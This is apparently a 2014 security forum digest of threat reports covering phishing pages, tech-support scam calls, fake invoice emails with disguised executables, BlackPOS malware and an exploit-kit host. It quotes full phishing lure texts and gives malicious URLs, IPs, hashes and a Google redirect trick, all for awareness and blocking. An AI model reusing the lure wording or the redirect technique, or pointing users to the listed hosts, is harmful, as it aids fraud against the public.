The -bogus- domain netflix-ssl .net (IP address: 176.74.28.254) was registered a few days ago through the “Crazy Domains FZ-LLC” registrar... The information requested on the phishing page includes name, address and credit card details. It’s sent back to the bad guys’ server with multiple POST requests... Note the clever use of a long URL that resembles the genuine one and that may be particularly effective on mobile devices:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/iphone5.png
We are reporting this site to the registrar and hosting company so that it can be taken down as soon as possible. Phishing scams are always getting more elaborate and unfortunately very hard to block because they keep popping up on new domains, registrars etc. truly making this a cat and mouse game between crooks and the security community. While many web browsers (Internet Explorer, Google Chrome, Mozilla Firefox) do have anti-phishing technology that blocks access to fraudulent sites, there often is a bit of a lag between the time a new site comes up and when it gets blacklisted. The best defence against these scams is awareness and suspicion from any email purporting to be from a company you deal with. There are some telltale signs to recognize phishing attacks such as poor grammar, spelling mistakes or obviously unrelated URLs as well as a general ‘urgency’ in the tone of the message."

176.74.28.254: https://www.virustotal.com/en/ip-address/176.74.28.254/information/

netflix-ssl .net / 92.222.121.100: https://www.virustotal.com/en/ip-address/92.222.121.100/information/
8.31.2014 9:02AM EDT
___

Internet Disconnection SCAM calls
- http://www.hoax-slayer.com/telstra-tech-support-scam-calls.shtml
Aug 29, 2014 - "Callers claiming to be from the technical department of Internet Service Providers (ISPs) such as Telstra warn that your Internet service is about to be disconnected because hackers have accessed your computer or it has been infected with viruses... The calls are -not- from your ISP... The best way to deal with these scammers is to simply hang up on their bogus calls... if you are unsure, terminate the call and contact the service provider directly. DO NOT use a phone number supplied by the scammers... find a phone number for the provider via a legitimate source such as a phone directory or bill. In some cases, if you are doubtful of their claims, the scammers may provide a 'technical support' phone number supposedly belonging to your ISP. But, when you call the number, you will simply be reconnected to the same scammer... service providers such as Telstra may contact you from time to time to review your service options or discuss a problem with your account, they will -never- demand an immediate -fee- over the phone to rid your computer of hackers or viruses. Nor will they ask you to download software that gives them access to your computer. Any caller that makes such a request should -not- be trusted..."
___

Fake Refund email targets UK taxpayers
- https://blog.malwarebytes.org/fraud-scam/2014/08/fraudulent-refund-mail-targets-uk-taxpayers/
Aug 29, 2014 - "Taxpayers in the UK should be wary of emails claiming they’re owed a tax refund to the tune of 100.60 GBP... The mail reads:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/faketax1.jpg
Clicking the Ow.ly link in the email sends potential victims to a .zip download hosted on what appears to be a -compromised- German bicycle shop website. Inside is a .html file containing a -fake- refund form. As a sidenote, it’s a little unusual to see scammers making use of Ow.ly shortening links for a HMRC phishing scam. The -fake- refund form asks for name, DOB, address, postcode, account number, full card details …all the usual bits and pieces of information required to -swipe- the payment information.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/faketax2.jpg
... the refund amount pre-filled on the form is 100.65 GBP. I’m not sure where the extra five pence comes from, though given that this is all a massive work of fiction anyway I don’t think it matters besides helping to tip off recipients that this isn’t a real refund. Feel free to report these missives to HRMC directly*, and remember: HMRC will -never- ask for payment information or notify taxpayers of refunds by email."
* http://www.hmrc.gov.uk/security/reporting.htm
___

New BlackPOS Malware emerges in-the-Wild - targets Retail Accounts
- http://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/
Aug 29, 2014 - "... a brand new BlackPOS (point-of-sale) malware detected by Trend Micro as TSPY_MEMLOG.A. In 2012, the source code of BlackPOS was -leaked- enabling other cybercriminals and attackers to enhance its code. What’s interesting about TSPY_MEMLOG.A is it disguises itself as an installed service of known AV vendor software to avoid being detected and consequently, deleted in the infected PoS systems... The malware can be run with options: -[start|stop|install|uninstall]. The –install option installs the malware with service name =<AV_Company> Framework Management Instrumentation, and the –uninstall option deletes the said service. The RAM scraping routine begins as a thread when the installed service starts. It may only start its main routine if it has successfully been registered as a service. Apart from masquerading itself as an AV software service, another new tactic of TSPY_MEMLOG.A is its updated process iteration function. It uses CreateToolhelp32Snapshot API call to list and iterate all running processes. BlackPOS variants typically use the EnumProcesses API call to list and iterate over the processes. It drops and opens a component t.bat after it has read and matched the track data. This track data is where the information necessary to carry out card transactions is located; on the card this is stored either on the magnetic stripe or embedded chip. The data will eventually get written out to a file called McTrayErrorLogging.dll. This is similar to what happened in the PoS malware attack involving the retail store, Target last December 2013... we recommend enterprises and large organizations implement a multi-layered security solution to ensure that their network is protected against vulnerabilities existing in systems and applications as this may be used to infiltrate the network. In addition, check also when a system component has been modified or changed as criminals are using known in-house software applications to hide their tracks. IT administrators can use the information on malware routines and indicators of compromise (IoCs) here to determine if their network has been compromised already by this new BlackPOS malware..."
(More detail at the trendmicro URL above.)
> http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-pos-system-breaches.pdf
___

Microsoft boots 1,500 apps from its Windows Store
- http://www.theinquirer.net/inquirer/news/2362576/microsoft-boots-1-500-apps-from-its-windows-store
Aug 29 2014 - "... Microsoft GM of Windows Apps and Store Todd Brix said in a blog post*, "As Windows Store expands to reach more customers in more markets with a growing list of great titles, we are continuously looking for ways to improve both customer experience and developer opportunity. We strive to give our worldwide customer base easy access to amazing app experiences while keeping developer friction to a minimum. From time to time this process slips out of sync and we need to recalibrate". Brix admitted that Microsoft found that some customers weren't satisfied with the Windows Store and some of the apps they found there, but he described the problem as involving merely misleading app descriptions... After relating how Microsoft tackled identifying apps having "confusing or misleading titles", Brix said, "Most of the developers behind apps that are found to violate our policies have good intentions and agree to make the necessary changes when notified. Others have been less receptive, causing us to remove more than 1,500 apps as part of this review so far....", not forgetting to reassure customers that "as always we will gladly refund the cost of an app that is downloaded as a result of an erroneous title or description".
* http://blogs.windows.com/buildingapps/2014/08/27/how-were-addressing-misleading-apps-in-windows-store/

:fear: :mad:

FYI...

Tesco Phish ...
- http://myonlinesecurity.co.uk/tesco-payback-rewards-phishing/
1 Sep 2014 - "... email arrives saying 'Tesco Payback Rewards'... email arrives apparently from Tesco saying 'Tesco Payback Rewards' that offers you £150 for filling in a Tesco customer satisfaction survey... it is a -scam- and is a phishing -fraud- designed to steal your bank and credit card details. The email says something like this:
Tesco Customer Satisfaction program selected you to take part in our quick survey.
To earn your 150 £ reward, please click here and complete the form.

Screenshots:
- http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/tesco_payback-_rewards1.png

- http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/tesco_payback-_rewards2.png

All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them... careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
___

Fake Statement SPAM - PDF malware
- http://myonlinesecurity.co.uk/statement-01092014-fake-pdf-malware/
1 Sep 2014 - "'Statement as at 01/09/2014' pretending to come from Cathy Rossi < C.Rossi@ tcreidelectrical .co.uk > is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... emails are not being sent from tcreidelectrical .co.uk or T C REID (ELECTRICAL) LTD, As far as we can determine they have not been hacked or their website or email system compromised... Email reads:

Please find attached statement from T C REID (ELECTRICAL) LTD as at 01/09/2014.

1 September 2014 : D0110109.PDF.zip ( 274kb): Extracts to D0110109.PDF.exe
Current Virus total detections: 2/55* . This Statement as at 01/09/2014 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/dd96f70183fd6f9482243e04b02a75c66040bafa64f612aebc99b4302709f1d7/analysis/1409570924/
___

O/S Market Share - August 2014 ...
- http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
Browser Market Share
- http://www.netmarketshare.com/browser-market-share.aspx?qprid=0&qpcustomd=0
9/1/2014
___

China gives MS 20 days to provide explanation in anti-trust probe
- http://www.reuters.com/article/2014/09/01/us-china-antitrust-microsoft-idUSKBN0GW1FD20140901
Sep 1, 2014 - "A Chinese anti-trust regulator said on Monday it has given Microsoft 20 days to reply to queries on the compatibility of its Windows operating system and Office software suite amid a probe into the world's largest software company. The State Administration for Industry and Commerce (SAIC) questioned Microsoft Vice President David Chen and gave the company a deadline to make an explanation... Microsoft is one of at least 30 foreign companies that have come under scrutiny by China's anti-monopoly regulators as the government seeks to enforce its six-year old antitrust law. Critics say the law is being used to unfairly target overseas businesses, a charge the regulators deny. According to a state media report on Monday, Microsoft's use of verification codes also spurred complaints from Chinese companies. Their use "may have violated China's anti-monopoly law", the official Xinhua news agency said on Monday. Verification codes are typically used by software companies as an anti-piracy mechanism. They are provided with legitimate copies of software and can be entered to entitle customers to updates and support from the manufacturer. Microsoft has long suffered from piracy of its software within China. Former Chief Executive Steve Ballmer told employees in Beijing that the company made less revenue in China than it did in the Netherlands... SAIC also repeated that it suspected the company has not fully disclosed issues relating to the compatibility of the software and the operating system... Last month, a delegation from chipmaker Qualcomm, led by company President Derek Aberle, met officials at the National Development and Reform Commission (NDRC) as part of that regulator's investigation of the San Diego-based firm. NDRC said earlier this year that the U.S. chipmaker is suspected of overcharging and abusing its market position in wireless communication standards. Microsoft's Nadella is expected to make his first visit to China as chief executive later this month."

:mad: :fear:

FYI...

Something evil on 95.163.121.188 (Sweet Orange EK)
- http://blog.dynamoo.com/2014/09/something-evil-on-95163121188-sweet.html
2 Sep 2014 - "95.163.121.188 is currently hosting the Sweet Orange Exploit Kit (hat tip*). The IP is allocated to Digital Networks CJSC (aka DINETHOSTING) that has featured on this blog many times before**...
(Long list of domains at the URL above.)
... The domains appear to be legitimates ones that have been hijacked in some way.
95.163.121.188 forms part of a large netblock of 95.163.64.0/18 - I have had -half- of this (95.163.64.0/19) blocked for several years which has stopped a great deal of badness, so I recommend that you -block- either the /19 or /18..."
* http://www.malware-traffic-analysis.net/2014/08/29/index.html

** http://blog.dynamoo.com/search/label/DINETHOSTING

> https://www.virusbtn.com/virusbulletin/archive/2013/03/vb201303-SweetOrange-ProPack
"... automated iframe obfuscating services for use in web injections. The iframes are -injected- into high-traffic-volume websites and force the users of the websites to visit end points that serve exploits carrying malware..."
___

Fake 'Bonus' SPAM/SCAM ...
- http://myonlinesecurity.co.uk/automated-draw/
2 Sep 2014 - "email received that tells you that you have won £1000 in an automated draw and haven’t claimed it yet:

Attempting to contact <REDACTED>
This is automated draw #23851
Our system shows you have been awarded with £1000!
According to our records, voucher wasn’t collected yet
Please be informed that your voucher is still valid. You may claim your wininngs and use them without making any deposit.
Confirm your email here to claim your £1000 voucher.
Have fun !
Lindsey Lane
CRM Manager..
* This offer is available to new players only.
You have received this email because you have requested more information from BonusNews...

Clicking the button that says claim your reward (or any other of the buttons) gives you a file to run on your computer that installs some casino software that is detected by several anti-malware programs as unwanted*..."
* https://www.virustotal.com/en/file/a615d125ab7423f6c89e5074ed42e568a898f3beab6c3c3c174f417c54529f89/analysis/
___

Hacks behind biggest-ever Password Theft begin Attacks
- http://it.slashdot.org/story/14/09/01/2213202/hackers-behind-biggest-ever-password-theft-begin-attacks
1 Sep 2014 - "Back in August, groups of Russian hackers assembled the biggest list of compromised login credentials ever seen: 1.2 billion accounts. Now, domain registrar Namecheap reports* the hackers have begun using the list to try and access accounts. 'Overnight, our intrusion detection systems alerted us to a much higher than normal load against our login systems. ... The group behind this is using the stored usernames and passwords to simulate a web browser login through -fake- browser software. This software simulates the actual login process a user would use if they are using Firefox/Safari/Chrome to access their Namecheap account. The hackers are going through their username/password list and trying each and every one to try and get into Namecheap user accounts'. They report that most login attempts are failing, but some are succeeding. -Now- is a good time to check that none of your important accounts share passwords."
* http://community.namecheap.com/blog/2014/09/01/urgent-security-warning-may-affect-internet-users/

:mad: :fear:

FYI...

Fake NDR SPAM - PDF malware
- http://myonlinesecurity.co.uk/ndr-bill-fake-pdf-malware/
3 Sep 2014 - "'NDR Bill' pretending to come from Ebilling <Ebilling@ westlothian .gov.uk> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Non domestic rates bills normally come out in February or March each year, so using this email template in September will or should raise alarm bells immediately. This particular email allegedly being sent by a Scottish Local Council should immediately alert a recipient in the rest of UK to being totally bogus:
Please find attached your Non Domestic Rates bill.
If your account is in credit you are due a refund unless you have any other debt due to the Council.
To allow your credit to be processed please confirm:
- If you want the credit transferred to another account you have with us. Please confirm the account details. – If you want the credit refunded by cheque, please confirm who it should be sent to and the address.
Links to Non Domestic Rates information are detailed below.
Important Note: If you access these links using a mobile phone the network provider may charge for this service.
Yours sincerely Scott Reid Revenues Manager ...

3 September 2014: 00056468.pdf.zip ( 207 kb): Extracts to 00056468.pdf.exe
Current Virus total detections: 3/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5d7a2618d95f21ab31cdea298dcb9b57739c0432acaad2167d2651538517c808/analysis/1409725854/

- http://blog.dynamoo.com/2014/09/fake-westlothiangovuk-ndr-bill-email.html
3 Sep 2014 - "Sometimes spammers come up with weird approaches. This one is a bill from West Lothian Council in the UK.. well, actually it -isn't- a bill but it comes with a malicious attachment.
From: Ebilling [Ebilling@ westlothian .gov.uk]
Date: 3 September 2014 09:20
Subject: NDR Bill
Please find attached your Non Domestic Rates bill...

Attached is a file 00056468.pdf.zip which contains a malicious executable D0110109.PDF.exe (which has an icon to make it look like a PDF file). This has a low detection rate at VirusTotal of 4/55*... This second component has a VT detection rate of just 3/55**. The Anubis report shows an attempted phone home to 80.94.160.129 (National Academy of Sciences of Belarus) and 92.222.46.165 (OVH, France)
Recommended blocklist:
80.94.160.129
92.222.46.165 ..."
(More at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/b9a54ef4f769068af029aa7941c464990c476911180c9f4ec3379ab3b51ff5b3/analysis/1409733696/

** https://www.virustotal.com/en-gb/file/960ed795dca89e50745251adf6712719a1af1aa5fd1a66c9424c777574180548/analysis/1409734574/
___

“YouTube Account Manager has sent you a Message…”
- https://blog.malwarebytes.org/fraud-scam/2014/09/youtube-account-manager-has-sent-you-a-message/
Sep 3, 2014 - "We’ve seen some complaints of a message sent to YouTube users via the YouTube messaging system, warning of account suspension:

YouTube account manager has sent you a message
We’d like to inform you that due to repeated or severe violations of our community guidelines and your YouTube account will be suspended 3 days from the time of this message. After careful review we determined that activity in your account violated our community guidelines, which prohibit spam, scams or commercially deceptive content. Please be aware that you are prohibited from accessing, possessing or creating any other YouTube accounts.
Please follow the following instructions to recover your account:
1. Please contact your account manager here: [url]
2. You have to complete a quick survey to make sure you are human.
3. Wait for our email explaining the next steps.
* If you decide to ignore this message and not follow the above steps your account will be suspended.

This is what you would see after hitting the supplied link in the message:
“Complete a survey to verify your account”
> http://blog.malwarebytes.org/wp-content/uploads/2014/09/ytaccountmanager1.jpg
This one is a survey scam, and whoever is sending these messages is looking to make a little cash along with the panic they’re no doubt whipping up in YouTube users right about now. The links displayed on the left hand side are regional and will take clickers to various offers / surveys / signups and downloads. If you’re in any doubt as to the status of your YouTube account, you’d be better served contacting them directly than being tricked by these false messages currently in circulation. Scammers will often use similar tactics to send phishing links and malware, so in some ways recipients of this missive are getting the best of a bad deal – it’s “only” surveys and forms to fill in, along with the occasional download. However, that doesn’t mean we should rush to jump through their survey sign-up hoops either. Steer clear of this one, and keep on making those videos."
___

Fake 'Internet free' email SCAM - malware attachment
- http://myonlinesecurity.co.uk/transaction-via-internet-free-charge-idi613410_745-fake-pdf-malware/
3 Sep 2014 - "'Transaction via the Internet free of charge, ID:I613410_745' pretending to come from Santander BillPay is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer... The -scammers-, malware purveyors and phishers do get more creative every day and this email is quite creative, with a link to report suspicious emails to Santander and genuine links to Visa, MasterCard and VeriSign in their efforts to persuade you that it is a genuine email and that you should open the attachment:
Dear <removed>,
Our system detectet that you have made a bill payment using our cloud-based BillPay processing website.
You can find all details regarding the transaction in attachment.
Important information on recent fake email activityA number of UK banks have recently been targeted by fraudsters using emails to ask customers to enter their security details into a fake website.
At Santander Corporate Banking we will never send you an email that asks you to verify your security details or link to Internet banking. If you receive an email claiming to be from Santander Corporate Banking that you are suspicious about, please forward it to phishing@ santander .co .uk
If you are worried that someone may already have your personal security details, then please contact us on 0151 966 2105. Calls are recorded and may be monitored for security, quality control and training purposes...

3 September 2014 : I613410_745.zip ( 57kb): Extracts to Bill_Payment_2E_832e458.pdf.exe
Current Virus total detections: 1/54* ... This 'Transaction via the Internet free of charge, ID:I613410_745' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/cdbf146c2e551614c0f66b700b36236afdb6edb66c91e29b8da79037e3513d5e/analysis/1409750135/
___

Fake attached CBE form SPAM - PDF malware
- http://myonlinesecurity.co.uk/please-review-attached-cbe-form-pdf-malware/
3 Sep 2014 - "'Please review the attached CBE form' pretending to come from Jonathan.Bledsoe@ adp .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email contains a genuine PDF file that is malformed and contains a script virus and can infect you with no action on your part by simply previewing the PDF in your browser or in the PDF reader...
Importat message, read right away.
Please review the attached CBE form, If you require changes to the options shown, please contact me right away so that we may address your concerns. We will record your elections in our system and provide you a final Client Confirmation Statement for your review.
Please sign and send it back.
Regards,
ADP TotalSource Benefits Team

3 September 2014 : cbe_form.pdf - Current Virus total detections: 8/54*
... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en/file/415616d596d105b6b7063dda97c25411747c4b7fe9543d8a9214483be7bd2675/analysis/1409761379/
___

Fake 'August report' SPAM - PDF malware
- http://myonlinesecurity.co.uk/august-report-fake-pdf-malware/
3 Sep 2014 - "'August Report' pretending to come from Jackie Cantrell <Jackie.Cantrell@ bankmanager .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Hello , Please find attached documents for last month. Please could you sign the BACs form and return it as your approval that I am to go ahead with the transmission. Kind regards Jackie Payroll Manager

This email attachment has 2 files inside it. Both are identical although have different names, so the bad guys get 2 bites at the cherry.
3 September 2014: BACs_Documents.zip ( 20 kb): Extracts to BACs_Documents.scr
and to Case_090314.scr . Current Virus total detections: 12/55* . This August Report is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/73466f316153b2a347a8e10fe83fd5e84e8c7ab494492cbc9e749fc5777fb1d7/analysis/1409724912/
___

Fake Sky .com SPAM ...
- http://blog.dynamoo.com/2014/09/skycom-statement-of-account-spam-again.html
3 Sep 2014 - "These fake Sky emails are pretty common and have a malicious attachment:
Date: Wed, 3 Sep 2014 09:17:22 +0200 [03:17:22 EDT]
From: "Sky.com" [statement@ sky .com]
Subject: Statement of account
Afternoon,
Please find attached the statement of account.
We look forward to receiving payment for August, invoice as this is now due for payment.
Regards,
Clark ...

The attachment is Statement.zip which contains a malicious executable Statement.scr which has a reasonable VirusTotal detection rate of 18/55*. The Anubis report indicates that the binary phones home..."
* https://www.virustotal.com/en-gb/file/73466f316153b2a347a8e10fe83fd5e84e8c7ab494492cbc9e749fc5777fb1d7/analysis/1409736793/
___

Fake 'Important Documents' email SPAM - PDF malware
- http://myonlinesecurity.co.uk/re-important-documents-fake-pdf-malware/
3 Sep 2014 - "'RE: Important Documents' pretending to come from Simon Leiman <Simon.Leiman@ rbs .com> the name of sender at RBS appears to be random and can be any name is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... No attachment in the email but a link to a compromised website to download the malware:
RE: Important Documents
[RBS Logo Image]
Building tomorrow
RE: Important Information
We’re letting you know we have received a request from your bank to complete and sign the attached documents.
To view/download the documents please click here.
Please fill out the documents and fax them at +44 131 242 0017
Simon Leiman
Senior Accounting Manager
Tel. +44 131 242 0017
Email: Simon.Leiman@ rbs .com
? Royal Bank of Scotland 2014 ...

3 September 2014: AccountDocuments.zip ( 12kb) : Extracts to AccountDocuments.scr
Current Virus total detections: 4/54* . This 'RE: Important Documents' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/35492a48e63c523aec07cae081645dbad07680916f6cfac51f34dcdde41c0822/analysis/
___

iCloud hack/leak now being used as Social Engineering lure
- http://blog.trendmicro.com/trendlabs-security-intelligence/icloud-hacking-leak-now-being-used-as-social-engineering-lure/
Sep 3, 2014 - "... it was certainly only a matter of time before some enterprising cybercriminal decided that things were ripe for leveraging with socially-engineered threats. And that’s just what happened, as our scanning brought to our attention some freshly-concocted schemes targeting those looking for the photos borne from the aforementioned leak. The first threat we found hails from Twitter, in the form of a tweet being posted with hashtags that contain the name of one of the leak’s -victims- Jennifer Lawrence. The tweet spots a shortened link that, if -clicked- leads the user to a website offering a video of the actress in question...
Tweet with malicious link:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/lawrencetweet.png
Website with offered video:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/lawrencewebsite.png
If the user goes on to engage the playback, they are instead redirected to a download page for a ‘video converter’. The downloaded file is detected as ADW_BRANTALL:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/lawrencevideoconverter.png
Besides this bait-and-switch maneuver, this particular threat also spread itself on Facebook by forcing users to share the malicious site on their profiles before they are given the ability to ‘play’ the offered video. This would result in the user’s wall being spammed with the link, as well as the download of another variant of ADW_BRANTALL. The spamming is shown below.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/lawrencefacebookwall.png
Of course, in both cases, the user does not get to watch any video at all. And from our analysis, it appears that the majority of the users affected by this are from the United States (70%). We also discovered several malicious files floating around the internet that have been relabeled as zipped archives and/or video files of the leaked pictures in question. Again, we believe these files as part of a cybercriminal scheme to target those looking for the pictures themselves... With this incident in mind, it’s a good time to remind users that all popular news events – the iCloud leak being a prime example of it – will always have cybercriminals taking advantage of it in one way or another. If it’s something that you’ll use a search engine for, there’s a good chance that they’ve already created threats for it that will jump on you the moment you go looking. And do note that the threats we’ve talked about above are not the only ones lying around in wait! Always get your online news from trusted websites, and refrain from looking for/and downloading illegal material (such as leaked private photos or cracked software). Look into installing a security solution as well, if you haven’t done so already in these turbulent times. A few fleeting moments of convenience or enjoyment is never worth the hassle."
___

'Infrastructure-configuration' adjustment
- http://www.reuters.com/article/2014/09/03/us-facebook-outages-idUSKBN0GY2EQ20140903
Sep 3, 2014 - "Facebook Inc went down briefly for an unknown number of U.S. users on Wednesday afternoon in what appeared to be the latest outage to affect the world's largest social network. Several users had earlier reported getting an error message, "unable to connect to the Internet" when attempting to sign in. Facebook said the log-in problems arose after what it called an infrastructure-configuration adjustment..."

:mad: :fear:

FYI...

Fake sage .co.uk "Invoice_7104304" SPAM - PDF malware
- http://blog.dynamoo.com/2014/09/sagecouk-invoice7104304-spam.html
4 Sep 2014 - "This -fake- invoice from Sage is actually a malicious PDF file:
From: Margarita.Crowe@ sage .co.uk [Margarita.Crowe@ sage .co.uk]
Date: 23 July 2014 10:31
Subject: FW: Invoice_7104304
Please see attached copy of the original invoice (Invoice_7104304).

Attached is a file sage_invoice_3074381_09042014.pdf which is -identical- to the payload for this Companies House spam* ..."
* http://blog.dynamoo.com/2014/09/companies-house-ar01-annual-return.html
4 Sep 2014 - "This -fake- Companies House spam comes with a malicious attachment.

Screenshot: https://4.bp.blogspot.com/-ye6yNCTxN5k/VAhC_lNqhQI/AAAAAAAAFjc/azWsv0o1st0/s1600/companies-house-5.png

Attached is a malicious PDF file ar01_456746_09042014.pdf which has a VirusTotal detection rate of 5/54**. The Malware Tracker report shows that this attempts to exploit the CVE-2013-2729 flaw that was patched over a year ago.."
** https://www.virustotal.com/en-gb/file/ecfb08b38bafedfebe2ed9175d10b0490a4afdf62597a628e0f083e406e58a2a/analysis/

- http://myonlinesecurity.co.uk/fw-invoice_5294370-pdf-malware/
4 Sept 2014: sage_invoice_3074381_09042014.pdf - Current Virus total detections: 4/55***
*** https://www.virustotal.com/en/file/ecfb08b38bafedfebe2ed9175d10b0490a4afdf62597a628e0f083e406e58a2a/analysis/1409823534/
___

Fake 'Unauthorised iTunes Purchase' email - PHISH
- http://myonlinesecurity.co.uk/unauthorised-itunes-purchase/
4 Sep 2014 - "email received that says 'Unauthorised iTunes Purchase'. The interesting point about this one is the phishing URL. It is a pass through from a genuine Google URL https ://www.google .com/url?gc=PAH96di-ZUnHVlY&q=%68%74tp%3a%2f%2Fdl6.c1l%2eus%2FSb7ouez&sa=D&usg=AFQjCNEQ84I8qa2xYHVEKwXmJMrXG0_GhA which bounces via another url http ://dl6.c1l .us/Sb7ouez to end up on http ://111.90.144.179 /datacare/login/auth/dc347f94af30dff3ce1efd53f335d0e7/low_aa/
I had no idea that you could use google, especially a HTTPS (secure site) link to pass through to a phishing or any other site. Almost anybody seeing a google link will think that it is safe. Obviously this is a big security risk that Google servers allow this sort of divert or pass through and it needs to be plugged. The site asks for your Apple ID and password, then sends you to a page saying:
My Apple ID
It looks like someone used your data to make unverified purchase.
We need to be sure that you’re real holder of this account and match the information you will provide us now with the information in our databases. Please make sure your information is correct before submitting it to us or it may cause further delays.
Thank you.

Then wants you to fill in the form to give them your Name, address, Date of Birth, Credit card details, Mobile phone number etc. Everything they need to take over your identity in the virtual world as well as clear out all your bank and credit card accounts. It will then bounce you to the correct Apple page..."

111.90.144.179: https://www.virustotal.com/en-gb/ip-address/111.90.144.179/information/

:mad: :fear::fear:

FYI...

Phishing safety ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/phishing-safety-is-https-enough/
Sep 5, 2014 - "It was recently reported that Google would improve the search ranking of HTTPS sites in their search engine. This may encourage website owners to switch from HTTP to HTTPS. Cybercriminals are -also- taking part in this switch... we recently spotted a case where users searching for the -secure- version of a gaming site were instead led to a phishing site. We researched phishing sites that used HTTPS and were blocked by Trend Micro web reputation technology from 2010-2014. Based on our investigation, the number of phishing sites is increasing and we expect it to -double- towards the latter part of 2014...
Number of HTTPS phishing sites from 2010 to 2014:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/HTTPS_count.jpg
One of the reasons for this spike is that it is easy for cybercriminals to create websites that use HTTPS: they can either compromise sites that already use HTTPS, or use legitimate hosting sites or other services that already use HTTPS. There is no need for the cybercriminals to acquire their own SSL certificate, since they have just abused or compromised servers that -do- have valid certificates...
Screenshots of legitimate site (left) and phishing site (right):
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/legvsphishingsite.jpg
... While some sites have a green icon bar in the address bar as a security indicator, users still need to check the common name and organization. For example, users search for the Bank of America login page and click on the top result. In the login page, they can check for the green icon bar and the domain name, (which in this case is bankofamerica.com). When they click the green icon bar, a window will pop up. Users can then check for the “Issued to” which is equivalent to “Common Name.” Note that the Common Name should be similar to the domain name...
Check the green icon bar and the domain name to determine if it is a legitimate site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/boagreenbaricon.jpg
As more and more sites use SSL due to the boost in Google search rankings, users will have to become aware that the padlock of HTTPS is no longer a sign that they are visiting a safe site. They must first check the certificate before proceeding to give enter credentials and personal identifiable information (PII)... Based on feedback from the Smart Protection Network data, the top affected countries that visit HTTPS phishing sites are US and Brazil.
Top affected countries:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/Affected-Countries-01.jpg ..."
___

Hoax email comes with malicious Word doc
- http://blog.dynamoo.com/2014/09/shakira-death-hoax-email-comes-with.html
5 Sep 2014 - "... Spanish-language spam email reports the (fake) death of Shakira in a car accident. Attached is a Word document that contains a malicious macro... translates as:
Shakira dies in serious accident
This morning at 1:10 A.M. in the neighborhood La Macarena, Colombia. The well-known singer and performer Shakira Isabel Mebarak Ripoll, suffered a serious car accident in which she lost herlife. Aboard the vehicle was her manager, who was seriously injured. Witnesses say the car driven by the latter, was speeding ..
To view exclusive images and details of the story, we have attached a document with all the information about this tragic event.

When attempting to open the Word document (IMAGENES_01.doc), the potential victim sees the following:
Screenshot: https://4.bp.blogspot.com/-Fl3B4-2DtGs/VAnGpyytNwI/AAAAAAAAFjw/tAwTQGZ3IR8/s1600/shakira.png

The rest of the document explains to the victim how to remove the security settings from Word, supposedly to enable them to view the pictures. But what will actually happen is that the malicious macro in the document will try to infect the PC. This malicious document has a VirusTotal detection rate of just 2/54*. According to an analysis of the document, it then appears to download additional components from an insecure Joomla site at [donotclick]www .papeleriaelcid .com/aurora/ajax/ ... In this case the originating IP was 207.150.195.247 (a SouthWeb Ventures IP allocated to a customer supposedly called "Microinformatica Gerencial, S.A. de C.V."). Blocking the papeleriaelcid .com site and rejecting emails from 207.150.195.247 might be wise ..."
(English or other languages may be spammed out next.)
* https://www.virustotal.com/en-gb/file/564d1beb56c8738d7d1c00f1e863abe0b0cbc1878c26d9c688df0b61da25875b/analysis/1409926479/
___

NatWest Phish: “You are Logging In from Different Cities”
- https://blog.malwarebytes.org/fraud-scam/2014/09/natwest-phish-you-are-logging-in-from-different-cities/
